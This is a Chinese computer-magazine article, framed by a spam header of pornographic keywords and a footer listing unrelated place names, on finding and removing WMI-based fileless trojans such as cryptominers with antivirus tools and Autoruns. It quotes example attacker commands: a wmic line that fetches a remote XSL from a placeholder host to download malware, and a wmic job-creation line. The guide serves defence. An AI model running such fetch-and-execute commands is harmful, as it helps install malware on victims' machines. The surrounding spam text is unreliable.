国产日韩欧美一区二区三区三州_亚洲少妇熟女av_久久久久亚洲av国产精品_波多野结衣网站一区二区_亚洲欧美色片在线91_国产亚洲精品精品国产优播av_日本一区二区三区波多野结衣 _久久国产av不卡

?

隱藏再深也不懼WMI木馬查殺實(shí)戰(zhàn)

2021-03-24 11:29俞木發(fā)
電腦愛好者 2021年6期
關(guān)鍵詞:本機(jī)挖礦腳本

俞木發(fā)

1.了解WMI惡意軟件的運(yùn)行機(jī)制

如上所述,WMI具備的功能非常豐富,對(duì)于黑客來說只要利用其中的命令就可以完成很多操作。比如獲得相應(yīng)的權(quán)限后,在目標(biāo)電腦上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以實(shí)現(xiàn)從網(wǎng)站服務(wù)器上下載所需的惡意軟件123.xsl(圖1)。

當(dāng)然在實(shí)際運(yùn)行中,這些惡意軟件還可以利用WMI進(jìn)行更多的操作,如使用“wmicjobcallcreate"123.exe",0,0,true,false,********154800.000000+480”命令創(chuàng)建一個(gè)在后臺(tái)運(yùn)行的任務(wù)計(jì)劃,甚至可以執(zhí)行創(chuàng)建系統(tǒng)服務(wù)、將DLL文件注入系統(tǒng)進(jìn)程等操作。因?yàn)檫@里使用的都是系統(tǒng)命令(wmic.exe),并不像常規(guī)的木馬、病毒那樣由本體執(zhí)行,所以稱之為“無文件”(嚴(yán)格來說是WMI腳本運(yùn)行,腳本被觸發(fā)后執(zhí)行下載木馬等操作)方式運(yùn)行。比如臭名昭著的“KingMiner挖礦木馬”,它通過WMI事件訂閱來不斷地觸發(fā)木馬在后臺(tái)運(yùn)行。

2.發(fā)現(xiàn)和識(shí)別WMI惡意軟件

WMI木馬的一個(gè)重要特性就是借助WMI腳本來下載或者激活木馬運(yùn)行。比如某WMI挖礦木馬感染電腦后會(huì)在系統(tǒng)里生成一個(gè)任務(wù)計(jì)劃,任務(wù)會(huì)在后臺(tái)連接到服務(wù)器并下載挖礦木馬。挖礦木馬運(yùn)行后會(huì)占用系統(tǒng)大量的資源和帶寬,導(dǎo)致Windows在日常使用時(shí)運(yùn)行緩慢,網(wǎng)頁打開速度也變得很慢,且電腦的硬盤指示燈一直在閃爍(因?yàn)槟抉R會(huì)在后臺(tái)不斷地讀取數(shù)據(jù))。如果自己的電腦在使用時(shí)有上述的異常現(xiàn)象,那么就需要使用安全軟件檢查是否中了木馬。

Windows10用戶可以先使用系統(tǒng)自帶的“安全中心”進(jìn)行查殺,如果無法解決問題則可以借助一些木馬專殺軟件,如火絨惡性木馬專殺工具(https://bbs.huorong.cn/thread-18575-1-1.html)進(jìn)行查殺,啟動(dòng)軟件后點(diǎn)擊“立即掃描”,常見的木馬(包括WMI木馬)一般都可以被自動(dòng)查殺(圖2)。

不過,如果中了WMI木馬,安全軟件只會(huì)將WMI腳本下載的木馬文件刪除,但是無法完全斬?cái)郬MI木馬文件的下載途徑,如上述介紹的WMI挖礦木馬就是利用任務(wù)計(jì)劃進(jìn)行下載。因?yàn)槿蝿?wù)計(jì)劃中并沒有惡意軟件,安全軟件是不會(huì)將其刪除的,所以通過專殺軟件刪除木馬后,每次重啟系統(tǒng)掃描后還是一直提示發(fā)現(xiàn)木馬文件,那么就極可能中了WMI木馬,這時(shí)就還需要對(duì)系統(tǒng)的啟動(dòng)項(xiàng)進(jìn)行檢查,查看是否有異常的啟動(dòng)項(xiàng)。

系統(tǒng)啟動(dòng)項(xiàng)檢查可以借助Autoruns來完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),啟動(dòng)程序后它會(huì)自動(dòng)對(duì)本機(jī)所有的啟動(dòng)項(xiàng)目進(jìn)行檢測(cè),包括計(jì)劃任務(wù)、服務(wù)、WMI等(圖3)。

比如筆者公司的一臺(tái)電腦在執(zhí)行安全掃描時(shí)就發(fā)現(xiàn)木馬文件無法徹底刪除的現(xiàn)象,在本機(jī)運(yùn)行Autoruns后切換到“計(jì)劃任務(wù)”,在打開的窗口中就可以看到后臺(tái)所有的任務(wù)計(jì)劃。對(duì)于沒有數(shù)字簽名的任務(wù),程序會(huì)使用淺紅色進(jìn)行標(biāo)注,可以看到本機(jī)中一個(gè)名為“l(fā)smosee”的任務(wù)極為可疑,它加載的是本機(jī)臨時(shí)目錄中的一個(gè)VBS文件(圖4)。

在上圖選中“l(fā)smosee”并右擊,選擇“跳轉(zhuǎn)到文件夾”,在打開的文件夾中根據(jù)圖上“鏡像路徑”的提示,使用記事本打開“54236.vbs”文件,其中顯示的正是一些WMI腳本的內(nèi)容,它的作用就是在后臺(tái)定時(shí)下載木馬文件。現(xiàn)在按提示將其刪除。接著返回上圖,選中“l(fā)smosee”任務(wù)并點(diǎn)擊“刪除”,這樣就可以切斷木馬的下載通道。最后使用火絨安全軟件再掃描一遍電腦,刪除其他帶毒的文件后,問題得到順利地解決(圖5)。

3.一勞永逸封禁WMI木馬下載

WMI木馬難以查殺的原因就是由于它的下載方式是通過WMI腳本實(shí)現(xiàn),而且WMI腳本激活的方法很多(如上例為任務(wù)計(jì)劃,有些則是使用進(jìn)程注入等),不過WMI腳本的運(yùn)行要依賴“WMI Performance Adapter”服務(wù),因此對(duì)于個(gè)人用戶來說,可以通過停用服務(wù)的方法來禁止WMI腳本的運(yùn)行。在桌面的任務(wù)欄搜索框中輸入“服務(wù)”,打開服務(wù)管理組件后找到上述服務(wù),雙擊打開后將其停止,并將其啟動(dòng)類型設(shè)置為“禁用”,這樣本機(jī)所有的WMI腳本就無法運(yùn)行了(圖6)。

猜你喜歡
本機(jī)挖礦腳本
酒駕
合力攻堅(jiān) 全面治理高?!巴诘V”
多措并舉 全流程整治“挖礦”
基于ADS-B的防撞檢測(cè)算法研究
飛機(jī)相遇模型仿真技術(shù)研究
數(shù)據(jù)庫系統(tǒng)shell腳本應(yīng)用
快樂假期
FreeBSD關(guān)機(jī)重啟命令
徐州市| 北海市| 盱眙县| 晋江市| 密云县| 巧家县| 萍乡市| 峨边| 邵东县| 梁山县| 时尚| 精河县| 武鸣县| 阳西县| 定结县| 荃湾区| 宁晋县| 景谷| 芮城县| 湘西| 湄潭县| 乐业县| 鄱阳县| 濮阳县| 新乡县| 井陉县| 竹溪县| 昌图县| 乐山市| 吉安市| 西宁市| 尉氏县| 仁布县| 普兰店市| 绵竹市| 库伦旗| 漳州市| 乌苏市| 油尖旺区| 石屏县| 伊川县|